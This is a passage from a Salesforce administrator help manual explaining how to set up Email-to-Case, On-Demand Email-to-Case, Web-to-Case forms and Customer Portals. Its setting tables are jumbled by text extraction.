Warning:  If the Email Subject and Email Body are the same, Email-to-Case creates an infinite loop of
emails related to each case. If this goes unchecked, Email-to-Case will eventually stop accepting new emails.

• To exclude the thread ID from email, deselect both the Email Subject and Email Body checkboxes. A new case will
be created when someone responds to an outbound case email.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview

Setting Up On-Demand Email-to-Case
On-Demand Email-to-Case is available in: Professional, Enterprise, Unlimited, and Developer editions.

User Permissions Needed

“Customize Application”To set up On-Demand Email-to-Case:

“Modify All Data”

AND
“Customize Application”

To enable On-Demand Email-to-Case:

On-Demand Email-to-Case helps your company efficiently resolve and correspond with customer inquiries via email. It
automatically creates a case in Salesforce when an email is sent to your company’s customer support email address(es) and
auto-populates case fields from the content of the message. On-Demand Email-to-Case allows you to process customer emails
up to 10 MB in size.
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Note:

Text in an email that is over 32,000 characters is automatically truncated to 32,000 characters by On-Demand
Email-to-Case. Your Salesforce.com representative can raise this limit to 128,000 characters for your organization if
necessary.

1. Set the Default Case Owner and Automated Case Owner for your organization.
2. Enable and configure Email-to-Case.
3. Enable and configure On-Demand Email-to-Case on page 1918.
4. Configure your routing address settings to customize the way Salesforce handles your customer emails.
5. Test your email routing addresses by manually sending emails to them and verify that these emails convert to cases based

on their routing address settings.
6. Add the email address that you configured to your company's support website. This is the email address customers can use

to submit cases to your support team.
7. Add the Emails related list to the Cases page layout.

Note:  You can create email templates that support reps can use to respond to Email-to-Case or On-Demand
Email-to-Case emails. These templates can include merge fields that display information from the original email in
the response.

See Also:
On-Demand Email-to-Case Settings
Routing Address Settings for Email-to-Case and On-Demand Email-to-Case
Enabling and Configuring On-Demand Email-to-Case
Email-to-Case and On-Demand Email-to-Case Overview

Enabling and Configuring On-Demand Email-to-Case

On-Demand Email-to-Case is available in: Professional, Enterprise, Unlimited, and Developer editions.

User Permissions Needed

“Customize Application”To set up On-Demand Email-to-Case:

“Modify All Data”

AND
“Customize Application”

To enable On-Demand Email-to-Case:

Before you enable On-Demand Email-to-Case, set the Default Case Owner and Automated Case User and enable
and configure Email-to-Case.

1. From Setup, click Customize > Cases > Email-to-Case.
2. Click Edit.
3. Select Enable On-Demand Service.
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4. Select your Over Email Rate Limit Action and Unauthorized Sender Action settings  based on how your
company plans to use On-Demand Email-to-Case.

5. Click Save.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview
On-Demand Email-to-Case Settings
Setting Up On-Demand Email-to-Case
Routing Address Settings for Email-to-Case and On-Demand Email-to-Case

On-Demand Email-to-Case Settings

On-Demand Email-to-Case is available in: Professional, Enterprise, Unlimited, and Developer editions.

These settings are specific to On-Demand Email-to-Case. For more information about general Email-to-Case settings, see
Email-to-Case Settings.

DescriptionOn-Demand Email-to-Case Setting

Choose what On-Demand Email-to-Case does with email
that surpasses your organization’s daily email processing limit:

Over Email Rate Limit Action

• Bounce message—The email service returns the message
to the sender or to the Automated Case User for
On-Demand Email-to-Case, with a notification that
explains why the message was rejected.

• Discard message—The email service deletes the message
without notifying the sender.

• Requeue message—The email service queues the message
for processing in the next 24 hours. If the message is not
processed within 24 hours, the email service returns the
message to the sender with a notification that explains why
the message was rejected.

If you limited the email addresses and domains available for
On-Demand Email-to-Case in the Accept Email From

Unauthorized Sender Action

field, choose what happens to messages received from senders
who are blocked:
• Bounce message—The email service returns the message

to the sender or to the Automated Case User for
On-Demand Email-to-Case, with a notification that
explains why the message was rejected.

• Discard message—The email service deletes the message
without notifying the sender.
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Make sure the subject line and body of your outgoing emails are unique.

Warning:  If the Email Subject and Email Body are the same, Email-to-Case creates an infinite loop of emails
related to each case. If this goes unchecked, Email-to-Case will eventually stop accepting new emails.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview

Configuring Routing Addresses for Email-to-Case and
On-Demand Email-to-Case

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure routing addresses for Email-to-Case and
On-Demand Email-to-Case:

Before you set up routing addresses for Email-to-Case and On-Demand Email-to-Case, you must enable Email-to-Case and
configure your Email-to-Case settings.

1. From Setup, click Customize > Cases > Email-to-Case.
2. In the Routing Addresses list, click New.
3. Enter your routing address settings.
4. Click Save.

A verification email is sent to the routing email address you provided.
5. Click the link in the verification email.

A confirmation page opens in your Web browser.
6. Click the link in the confirmation page to continue to Salesforce.

You must configure your email system to forward case submissions to the email services address provided by Salesforce.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview
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Routing Address Settings for Email-to-Case and
On-Demand Email-to-Case

Email-to-Case and On-Demand Email-to-Case are available in: Professional, Enterprise, Unlimited, and Developer
Editions.

You can define your email routing address settings after you add and verify your email routing addresses for Email-to-Case
and On-Demand Email-to-Case.

DescriptionSetting

The name for the routing address—for example, Gold Support
or Standard Support.

Routing Name

Email-to-Case source only: The inbound email address for this
On-Demand Email-to-Case routing address. Email sent to

Email Address

this address creates new cases using the specified settings. The
email address must be unique.

Note that this is the email address to which you will provide
a link on your company's support website.

Email-to-Case source only: Select this checkbox to save the
email routing information associated with each email

Save Email Headers

submitted as a case. Saving email routing information counts
towards your organization's overall storage limit.

To view email headers from an email converted to a case, see
Working with Case Emails on page 1701.

To limit the email addresses and domains available for
On-Demand Email-to-Case, entering them in this field. Leave

Accept Email From

it blank to allow On-Demand Email-to-Case to receive email
from any email address or domain.

Email-to-Case source only: Select this checkbox to automatically
assign a task to the case owner when an email is submitted as
a case.

Assignment rules automatically assign owners to a case;
however, if a case does not match assignment rule criteria,

Create Task from Email

then the user in the Default Case Owner field on the
Support Settings page is assigned to the case.

Email-to-Case source only: Choose a status from this drop-down
list with which to predefine the Status field on tasks

Task Status

automatically assigned to case owners when email is submitted
as cases.

This setting is only available if you selected the Create Task
from Email checkbox.
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DescriptionSetting

Outlook source only: The owner of the case, which can be either
an individual user or a queue.

Case Owner

The priority assigned to cases created from emails sent to this
email routing address.

Case Priority

The value assigned to the Case Origin field for email sent
to this email routing address.

Case Origin

Note:  The Priority and Case Origin fields auto-populate the case via the routing address settings when the
routing address is included in either the To, CC, or BCC fields of an inbound email.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview

Email-to-Case FAQ
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

• How can I prevent spam from becoming cases?

• Is there a size limit for attachments using Email-to-Case?

Is there a size limit for attachments using Email-to-Case?
Email attachments using On-Demand may be up to 10 MB. There is no attachment size limit when using the Email-to-Case
agent.

See Also:
Email-to-Case FAQ

How can I prevent spam from becoming cases?
You can limit spam through the following options:

• Create a black list rule to reject emails from specified IP addresses.
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• Download spam filter apps from AppExchange.

See Also:
Email-to-Case FAQ

CREATING WEB AND SOCIAL CHANNELS

WEB CASES

Capturing Web Cases
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up Web-to-Case:

With Web-to-Case, you can gather customer support requests directly from your company’s website and automatically generate
up to 5000 new cases a day. This can help your organization respond to customers faster, thus improving the productivity of
your support team.

Preparation

Before setting up Web-to-Case:

• Create custom case fields, if needed.
• Create a default email template for the automated notification email that will be sent to your customers upon submission

of each case.
• Create case queues if you wish to assign incoming cases to queues as well as individual users.
• Customize the Support Settings to select the default owner of cases that fail to meet the criteria in your assignment rule

(see Customizing Support Settings on page 2156).
• Create an active case assignment rule to determine how web-generated cases are assigned to users or put into queues. If

you do not set an active assignment rule, all web-generated cases are assigned to the default owner you specify in the
Support Settings.

For information on setting up Web-to-Case, see Setting Up Web-to-Case on page 1924.
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Setting Up Web-to-Case
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up Web-to-Case:

To set up Web-to-Case:

1. See Preparation on page 1923.
2. From Setup, click Customize > Self-Service > Web-to-Case. This tool helps you generate the HTML code that your

webmaster can insert into your company's website.

a. Click the link to enable Web-to-Case, and check the box to turn it on.
b. Select a default response template for automatically notifying customers that their case was created.

If you set up response rules to use different email templates based on the information submitted, the default email
template is used when no response rules apply. Leave this option blank if you do not wish to send emails when no
response rules apply. This template must be marked as “Available for Use.”

c. Choose the default Origin for all Web cases, and click Save.
d. Click Generate the HTML.

Tip:  Use a custom multi-select picklist to allow customers to report cases on several products at a time.

e. To select the fields to include on your Web-to-Case form, use the Add and Remove arrows to move fields between
the Available Fields list and the Selected Fields list. Use the Up and Down arrows to change the order of the fields on
your form.

For organizations using multiple currencies, add the Case Currency field to the HTML if you add any other currency
amount fields, otherwise all amounts will be captured in your corporate currency.

For organizations using record types on cases, select the Case Record Type field if you want users submitting
Web-generated cases to select specific record types.

f. If your organization uses the Self-Service portal or the Customer Portal and you want Web-generated cases to be visible
to users in these portals, select Visible in Self-Service Portal.

g. If your organization uses the Translation Workbench or has renamed tabs, select the language for the form labels
displayed on your Web-to-Case form. The source of your Web-to-Case form is always in your personal language.

h. Specify the complete URL to which customers should be directed after they submit their information, and click
Generate. This could be a “thank you” page or your company's home page.

3. Copy the generated HTML code and provide it to your company’s webmaster so he or she can incorporate it into your
website.

4. Click Finished.
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5. If you want to test the Web-to-Case form, add the line <input type="hidden" name="debug" value="1"> to
the code. This line redirects you to a debugging page when you submit the form. Don't forget to remove it before releasing
the Web-to-Case page to your website.

Note:

• All Web-generated cases that are not assigned automatically via the case assignment rule are assigned to the default
case owner specified in your Support Settings page.

• Whenever possible, Web-generated cases are automatically linked to the relevant contact and account based on
the customer’s email address.

• Salesforce runs field validation rules before creating records submitted via Web-to-Case and only creates records
that have valid values. All universally required fields must have a value before a record can be created via
Web-to-Case.

• The format for date and currency fields captured online is taken from your organization’s default settings - Default
Locale and Currency Locale.

• Salesforce doesn’t support rich text area (RTA) fields on Web-to-Case forms. If you use RTA fields on your
forms, any information entered in them is saved as plain text when the case is created.

• If your organization exceeds its daily Web-to-Case limit, the default case owner (specified in your Support Settings
page) will receive an email containing the additional case information.

See Also:
Setting Up Customer Support

Web-to-Case FAQ
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

• What is the maximum number of web cases we can capture?

• Who owns new web-generated cases?

• How do I specify which information to capture?

• Can I capture cases from multiple web pages?

• How can our webmaster test the Web-to-Case page?

• What status and origin are assigned to Web-generated cases?

• How can I be sure that cases won't be lost?

• How do I avoid Web-to-Case spam?

What is the maximum number of web cases we can capture?
In Professional, Enterprise, Unlimited, and Developer Edition organizations, you can capture up to 5,000 cases in a 24–hour
period. If your company generates more case requests than that, click Help & Training at the top of any page and select the
My Cases tab to submit a request for a higher limit directly to salesforce.com Customer Support.
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When your organization reaches the 24–hour limit, salesforce.com stores additional requests in a pending request queue that
contains both Web-to-Case and Web-to-Lead requests. The requests are submitted when the limit refreshes. The pending
request queue has a limit of 50,000 combined requests. If your organization reaches the pending request limit, additional
requests are rejected and not queued. Your administrator receives email notifications for the first five rejected submissions.
Contact salesforce.com Customer Support to change your organization's pending request limit.

See Also:
Web-to-Case FAQ

Who owns new web-generated cases?
Your administrator can set an active case assignment rule to automatically assign web-generated cases to users or queues based
on specific criteria in those cases. Cases that do not match any of the assignment rule criteria are assigned to the Default Case
Owner specified in the Support Settings.

See Also:
Web-to-Case FAQ

How do I specify which information to capture?
When you generate the HTML for your company's website, you can choose which standard or custom case fields for which
you want to gather information. You must create the custom case fields prior to generating the HTML code. From Setup,
click Customize > Self-Service > Web-to-Case to set up the feature and generate the HTML.

See Also:
Web-to-Case FAQ

Can I capture cases from multiple web pages?
Yes. Insert the generated HTML code into the web pages from which you want to capture cases. Whenever someone submits
information on any of those web pages, a case will be created.

See Also:
Web-to-Case FAQ

How can our webmaster test the Web-to-Case page?
Add the following line to your Web-to-Case code if you want to see a debugging page when you submit the form. Don't
forget to remove this line before releasing the Web-to-Case page on your website.
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<input type="hidden" name="debug" value="1">

See Also:
Web-to-Case FAQ

What status and origin are assigned to Web-generated cases?
New Web cases are marked with the default status that your administrator selected from the Case Status picklist values.
The default value for the Origin field is determined by your administrator when setting up Web-to-Case.

See Also:
Web-to-Case FAQ

How can I be sure that cases won't be lost?
If your organization exceeds its daily Web-to-Case limit, the Default Case Owner (specified in the Support Settings) will
receive an email containing the additional case information. If a new case cannot be generated due to errors in your Web-to-Case
setup, Customer Support is notified so that we can assist you in correcting it.

If your organization is using On-Demand Email-to-Case, Salesforce ensures that your cases won't be lost if users submit them
during a scheduled Salesforce downtime.

See Also:
Web-to-Case FAQ

How is the “Age” calculated in case reports?
The Age of an open case is the time that has elapsed from its creation to the present. The Age of a closed case is the elapsed
time from its creation to the time it was closed. Case reports display a drop-down list labeled “Units” that lets you choose to
view the Age in days, hours, or minutes.

See Also:
Case Fields
Web-to-Case FAQ

How do I avoid Web-to-Case spam?
Avoid receiving spam in your Web-to-Case forms by using the following solutions:
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• Creating validation rules.

• Utlilizing CAPTCHA.

• Using Web services.

See Also:
Web-to-Case FAQ

CUSTOMER PORTALS

Setting Up Your Customer Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

A Salesforce Customer Portal provides an online support channel for your customers—allowing them to resolve their inquiries
without contacting a customer service representative. With a Customer Portal, you can customize and deliver a visually stunning
user interface to your customers, and use the following Salesforce features to help you and your customers succeed:

• Determine which pages and fields customers see with page layouts and field-level security

• Manage customers with profiles, permission sets, roles, and sharing rules

• Provide and organize documents via Salesforce CRM Content or the Documents tab

• Create a knowledge base for your customers using Salesforce Knowledge

• Allow customers to participate in Ideas communities.

• Display and collect data that is unique to your organization with custom objects

• Display custom s-controls and content from other websites via Web tabs

• Provide customized reports via the Reports tab

Note:  The Service Cloud Portal is the Customer Portal intended for many thousands to millions of users. Service
Cloud portal users are also referred to as high-volume portal users. See About High-Volume Portal Users (Service
Cloud Portal Users) on page 1969.

1928

Setting Up Your Customer PortalCreating Web and Social Channels



Setting up your Customer Portal consists of the following steps:

1. Enable the Customer Portal.
2. Create one or more portals.

For each portal:

a. Configure the settings and communication templates.

You can standardize the communication templates sent to the users of all your Customer Portals by clicking the Set
Default Email Templates for All Customer Portals link on the Tools section of the Customer Portal Setup page. For
more information, see Creating Multiple Customer Portals on page 1935.

The Convert Portal User Access wizard automatically displays after the first time you save settings for your first portal,
whether it is the Customer Portal or partner portal. You can use this wizard to help ensure that records and folders
owned by Salesforce users are not shared with portal users.

b. Customize the fonts and colors.
c. Customize the available tabs and tab order.
d. Configure portal languages.

3. Optionally, if available to your portal user licenses, you can enable Salesforce CRM Content, Ideas, Answers, Entitlement
Management or Salesforce Knowledge as needed.

4. Create Customer Portal profiles.

For each profile:

a. Customize page layouts. See Customizing Your Customer Portal Pages.

For set up tips and general information about Salesforce Customer Portal pages, see Setup Tips and Considerations
for Customer Portal Pages on page 1958.

b. Customize list views.

Customer Portal users can automatically see any list view with visibility settings marked Visible to all users.
We recommend that you create specific list views on all objects accessible to portal users, and then assign portal users
to only the list views you want them to view.

c. Customize search layouts.

The search layouts in your Salesforce organization are the same search layouts used in your Customer Portal. Verify
that search layouts on objects accessible to portal users only include fields you want them to view in search results.

5. Set up workflow:

a. Set up workflow rules or case assignment rules to automatically assign cases created by portal users to Salesforce users
or queues by using the criteria Current User: User Type contains Customer Portal.

For case assignment rules to work on the Customer Portal, select the Show Case Assignment checkbox and
Select Case Assignment checkbox by default checkboxes on case page layouts assigned to portal profiles.
Portal users cannot view these checkboxes on the Customer Portal. Note that assignment rules trigger when a case is
created and when it is edited. To prevent cases from being automatically reassigned when edited by portal users, add
a rule entry using the criteria Current User: User Type contains Customer Portal and select the Do
Not Reassign User checkbox

b. Create workflow alerts or case auto-response rules to automatically respond to portal users when they create a case on
your portal.
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6. Configure portal user access.
7. Grant high-volume portal users access to objects.
8. Optionally, enable single sign-on.
9. Enable login on each Customer Portal.
10. Add a link on your organization’s website to the portal.

Users can navigate to your Customer Portal after you copy the Login URL from your portal’s settings and paste it into
the HTML of your website. For more information, see Enabling Customer Portal Login and Settings on page 1937.

11. Enable contacts to use your portal.

To learn more about implementing a Customer Portal, see Preparation for Setting Up Your Portal on page 2003.

Note: Contact salesforce.com about activating a Customer Portal for your organization.

See Also:
Customer Portal Setup Limits
Creating Multiple Customer Portals
Enabling Single Sign-On for Portals
Configuring Multilingual HTML Messages for Customer Portals
Administrator setup guide: Salesforce Customer Portal Implementation Guide

What customer portals can I create with Salesforce?
Salesforce provides three ways to help you manage your customers. The following table briefly describes the differences between
them:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Self-Service PortalSalesforce Customer PortalChatter Answers

Provides customers with an
online support channel to resolve

Provides customers with an
online support channel to resolve

Provides customers with a Web
Community to resolve their

Purpose

their inquiries without
contacting a support agent

their inquiries without
contacting a support agent

inquiries with other community
members or by contacting a
support agent

Customizable via a cascading
style sheet (CSS) or
point-and-click editor

Highly customizable via a
point-and-click editor, as well as
functionality similar to Salesforce
such as permissions, custom

Highly customizable via a
point-and-click editor and
Visualforce pages, as well as
functionality from Salesforce

User Interface

objects, sharing rules, and Web
tabs

features such as Answers,
Customer Portal, Force.com
Sites, and Salesforce Knowledge
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Self-Service PortalSalesforce Customer PortalChatter Answers

Supported Record
Types

• Cases• Activities• Articles
• ••Cases SolutionsAssets

•• CasesQuestions (answers)
• Documents
• Solutions
• Custom objects

OneContact salesforce.com for more
information

Contact salesforce.com for more
information

Quantity

Administrator
Controls

••• Generate Self-Service
usernames and passwords

Customize the look and feel
of theCustomer Portal

Customize the look and feel
of the community

• ••Moderate questions and
answers

Manage Self-Service user
information

Generate Customer Portal
usernames and passwords

•• Manage Customer Portal
user information

Generate usernames and
passwords

• •Manage Customer Portal
user information

Manage Customer Portal
users via permissions, roles,
and sharing rules• Manage Customer Portal

users via permissions, roles,
and sharing rules

NoneUsers can use the Customer
Portal Welcome component to
change their:

Users can click Edit My Settings
after they sign in to change their:

User Controls

• Community username
• Portal username• Community password
• Portal password• Locale
• Locale• Language
• Language• Time zone
• Time zone• Notification settings
• Contact information• Contact information

Note:  Contact salesforce.com to activate a specific portal for your organization.
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Enabling Your Customer Portal

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable the Customer Portal:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

To enable the Salesforce Customer Portal:

1. From Setup, click Customize > Customer Portal > Settings.
2. Click Edit.
3. Select Enable Customer Portal.
4. Click Save.
5. Continue setting up the portal.

Tips on Enabling the Customer Portal

Consider the following when enabling the Customer Portal:

• After you enable the Customer Portal, you can create multiple Customer Portals to satisfy the various business needs of
your customers.

• These items become available after you enable the Customer Portal:

◊ The High Volume Customer Portal, Authenticated Website, Customer Portal Manager, and Customer Portal User
profiles, if you purchased user licenses for them.

◊ The Enable Customer Portal User and View Customer Portal User buttons on contact and person account records.
◊ The All Customer Portal Users and All Internal Users groups along with the Roles and Internal Subordinates sharing

rule category.

• After you enable a Customer Portal, you cannot disable it. However, you can prevent users from logging into it. See
Enabling Customer Portal Login and Settings on page 1937.

See Also:
Setting Up Your Customer Portal
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About the Convert Portal User Access Wizard

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To set sharing rules:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Because Customer Portal and partner portal users appear in the role hierarchy but are external contacts who should not have
access to your organization's internal data, you must configure your organization's sharing settings to prevent inappropriate
access by portal users. When setting up a Customer Portal or partner portal, you can use the Convert Portal User Access wizard
to help ensure that no records or folders are shared with a portal user. The wizard affects the following:

Sharing Rules

The Convert Portal User Access wizard converts any sharing rules that include the Roles, Internal and Portal Subordinates
data set category to include the Roles and Internal Subordinates data set category instead.

The Roles and Internal Subordinates data set category allows you to create sharing rules that include all users in a specified
role plus all of the users in roles below that role, excluding any Customer Portal and partner portal roles.

Only organization-wide sharing rules are updated when you convert Roles, Internal and Portal Subordinates to Roles
and Internal Subordinates. The Roles, Internal and Portal Subordinates category for queues, public groups, list views,
documents, and manual sharing created on specific records by clicking the Sharing button is not converted to Roles and
Internal Subordinates.

Note: The Roles, Internal and Portal Subordinates data set category is only available in your organization after
you create at least one role in the role hierarchy.

The Roles and Internal Subordinates data set category is only available in your organization after you create at
least one role in the role hierarchy and enable a portal.

Folder Sharing

The Convert Portal User Access wizard also enables you to automatically convert the access levels of any report, dashboard,
or document folders that are accessible to Roles, Internal and Portal Subordinates to a more restrictive access level: Roles
and Internal Subordinates. This helps prevent Customer Portal and partner portal users from accessing folders. Using
the wizard is more efficient than locating various folders in Salesforce and setting their access levels individually.

The wizard does not convert folders that are accessible to all users or accessible to public groups. You must manually
update the access levels on those folders.
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When you first save a Customer Portal or partner portal, Salesforce automatically displays the Convert Portal User Access
wizard.

See Also:
Using the Convert Portal User Access Wizard
Configuring User Access to the Customer Portal

Using the Convert Portal User Access Wizard

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To set sharing rules:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

When setting up a Customer Portal or partner portal, you can use the Convert Portal User Access wizard to help ensure that
no records or folders are shared with a portal user.

To use the wizard:

1. For the Customer Portal, from Setup, click Customize > Customer Portal > Settings. For the partner portal, from Setup,
click Customize > Partners > Settings.

2. Click the Convert Portal User Access link.
3. Select the checkboxes next to the sharing rules you want to convert to Roles and Internal Subordinates.

If there are no sharing rules to convert but you want to convert the access level for folders, proceed to the following step.

4. Click Next.
5. Select the checkboxes next to the folders whose access levels you want to change to Roles and Internal Subordinates.

The wizard does not convert folders that are accessible to all users or accessible to public groups. You must manually update
the access levels on those folders.

A particular folder may display on multiple rows in the wizard. This is because the wizard displays a row for each Role,
Internal and Portal Subordinates category to which a folder is shared.

6. Click Next.
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7. Click Save to apply your selected changes.

See Also:
About the Convert Portal User Access Wizard

Creating Multiple Customer Portals

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create multiple Customer Portals:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

After you have enabled the Salesforce Customer Portal, you can create multiple Customer Portals to satisfy the various business
needs of your customers.

To create more than one Customer Portal:

1. From Setup, click Customize > Customer Portal > Settings.
2. Click New.
3. Follow the same steps used to set up your organization's first Customer Portal. See Setting Up Your Customer Portal on

page 1928.

Note:  Contact salesforce.com for information about the number of Customer Portals you can activate for your
organization.

Before you begin creating multiple Customer Portals for your organization, review the following implementation tips and best
practices.

Implementation Tips

• Portal users can only log into Customer Portals assigned to their profile. To assign a profile to a Customer Portal, select
the name of a portal from the Customer Portal Setup page, click Edit Profiles in the Assigned Profiles section, and select
the Active checkbox next to the profile you want to assign to the portal.

A portal user can access all the Customer Portals assigned to his or her profile with one username and password.

You can view the number of active users associated with each profile assigned to a Customer Portal by creating a custom
summary report and adding Profile to your report columns.

• The login URL of each Customer Portal you create contains a unique identifier, such as portalId=060D00000000Q1F.
The unique identifier determines the specific portal a user can access. If a user accesses a login URL that does not contain
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a unique identifier, they are automatically directed to the login URL of the first Customer Portal you created. Note that
portal users can only log into a Customer Portal via the portal's login page and not through the Salesforce login page.

• The settings on the following items apply to both your organization and your Customer Portals:

◊ List views
◊ Search layouts
◊ Case assignment rules
◊ Workflow alerts

Best Practices

• Because you can uniquely customize the fonts, colors, email templates, and login message of each Customer Portal you
create, you can build a Customer Portal for each product and customer service level supported by your organization. For
example, if your organization provides gold, silver, and bronze levels of customer support, then you could create a unique
Customer Portal for each.

Note:  JavaScript and CSS code are automatically removed from HTML files used as the portal login message.

• You can standardize the communication templates sent to the users of all your Customer Portals by clicking the Set Default
Email Templates for All Customer Portals link on the Tools section of the Customer Portal Setup page. These settings
determine the email templates to use when sending email notifications, such as a new case comment or a reset password,
to portal users whose profiles are associated with more than one Customer Portal.

By default, sample templates are automatically selected for you in the New User Template, New Password Template,
and Lost Password Template lookup fields. However, sample templates are not selected for you in the New Comment
Template and Change Owner to Portal User Template lookup fields. Unless you select templates for these
fields, users whose profiles are associated with more than one Customer Portal will not receive email notifications when
new comments are added to their cases or when they become the new owner of a record in the Customer Portal. Email
templates must be marked as Available for Use to be sent to portal users.

Tip:  Because the default email templates are sent to users of multiple Customer Portals, we recommend that you
create default email templates that do not contain portal-specific branding.

• You cannot delete a Customer Portal, but you can prevent users from logging into a portal by deselecting the Login
Enabled checkbox. For more information, see Enabling Customer Portal Login and Settings on page 1937.

• You can create multiple Customer Portals that display different tabs for users with the same profile, as long as the profile
has access to each object displayed on a tab. For more information, see Customizing Your Customer Portal Tabs on page
1947.

See Also:
Setting Up Your Customer Portal
About Customer Portal User Management
Administrator setup guide: Salesforce Customer Portal Implementation Guide

1936

Setting Up Your Customer PortalSetting Up Customer Channels

http://na1.salesforce.com/help/doc/en/salesforce_customer_portal_implementation_guide.pdf


Enabling Customer Portal Login and Settings

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable login and settings for the Customer Portal:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

1. From Setup, click Customize > Customer Portal > Settings.
2. Click Edit next to the name of the Salesforce Customer Portal you want to customize.
3. Set the following options:

DescriptionSetting

Name of the Customer Portal as displayed on the portal's
detail and edit pages, as well as the Customer Portal Setup

Name

page. The name of the Customer Portal is not displayed on
portal pages, but it does display in the browser title bar.

The name of your portal must be unique for your
organization and not already in use by a Customer Portal or
partner portal. Furthermore, an error may occur if you name
a Customer Portal “partner portal” Customer Portal

A description of the Customer Portal as displayed on the
portal's detail and edit pages. The description of the
Customer Portal is not displayed in the portal.

Description

Allows users to log in to the Customer Portal.

We recommend that you do not select this checkbox until
you have completed the steps described in Setting Up Your
Customer Portal.

Login Enabled

Note:  Users must be able to log in to the Customer
Portal, be within their user profile’s restricted IP
range, and be within designated Login Hours in
order to be able to reset their passwords.
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DescriptionSetting

Click the lookup icon ( ) to choose a default administrator
for your Customer Portal. All email notifications regarding

Administrator

users who self-register for your Customer Portal will be sent
to this Salesforce user.

Notifications include information about registration errors
and any other issues self-registering customers may
experience, such as inadvertently entering duplicate email
addresses, creating duplicate contact records, and exceeding
your organization's user license limit.

When choosing an administrator for your Customer Portal,
you can only select users that have the “Edit Self-Service
Users” permission. Furthermore, you cannot deactivate a
user selected as a portal administrator.

Portal Default Settings

DescriptionSetting

The URL of the Web page that displays when users log in
to your Customer Portal.

You can click this URL to log in to your portal and interact
with it.

Login URL

Insert this URL into your website so users can access the
login page to your Customer Portal.

The login URL of each Customer Portal you create contains
a unique identifier, such as portalId=060D00000000Q1F.
The unique identifier determines the specific portal a user
can access. If a user accesses a login URL that does not
contain a unique identifier, they are automatically directed
to the login URL of the first Customer Portal you created.
Note that portal users can only log into a Customer Portal
via the portal's login page and not through the Salesforce
login page.

The URL of the Web page that displays when users log out
of the Customer Portal–for example,

Logout URL

“http://www.acme.com.” If a logout URL is not specified,
portal users return to the login page when they log out.

The top-level category accessible by customers in the
Customer Portal. Customers can view all solutions marked

Top-Level Category for Portal

Visible in Self-Service Portal in this category
and its subcategories.
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Portal Default Settings

DescriptionSetting

This field is available only if you have enabled solution
browsing. See Customizing Solution Settings on page 2297.

Allows users to close cases in the Customer Portal directly
from suggested solutions. For example, when a user views a

Enable Self-Close Case from Suggested
Solutions

suggested solution that helps them solve a case, he or she
can click Yes, please close my case if this setting is enabled.

Allows users to view confirmation messages after they
complete an action in the Customer Portal. For example,

Show Action Confirmation

after a user creates a case in your Customer Portal, he or she
views the message “Case has been submitted” if this setting
has been enabled.

Confirmation messages may help users clearly understand
actions they have completed in your Customer Portal.

Specifies the language that portal HTML messages are
displayed in when custom language portal HTML messages

HTML Messages Default Language

are not configured. This setting is only available for
organizations that have multiple languages enabled.

Email Notification Settings

DescriptionSetting

The email address from which all Customer Portal
communication templates are sent—for example,

From Email Address

“support@acme.com.” Salesforce sends the emails
automatically, but they appear to portal users as if they were
sent from this email address. If a portal user responds to a
communication template, the response is sent to this address.

The name associated with the “From” Email Address—for
example, “Acme Customer Support.”

From Email Name

The email template used to send a username and initial
password to all newly enabled and self-registering Customer

New User Template

Portal users. By default, a sample template is automatically
selected for you. You can also create your own template or
modify the sample. Be sure to mark the template as
Available for Use.

The email template used to send a new password to existing
Customer Portal users when you reset their passwords. By

New Password Template

default, a sample template is automatically selected for you.
You can also create your own template or modify the sample.
Be sure to mark the template as Available for Use.
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Email Notification Settings

DescriptionSetting

The email template used to send a new password to existing
Customer Portal users when they reset their own passwords

Lost Password Template

by clicking Forgot your password? on the login page of the
Customer Portal. By default, a sample template is
automatically selected for you. You can also create your own
template or modify the sample. Be sure to mark the template
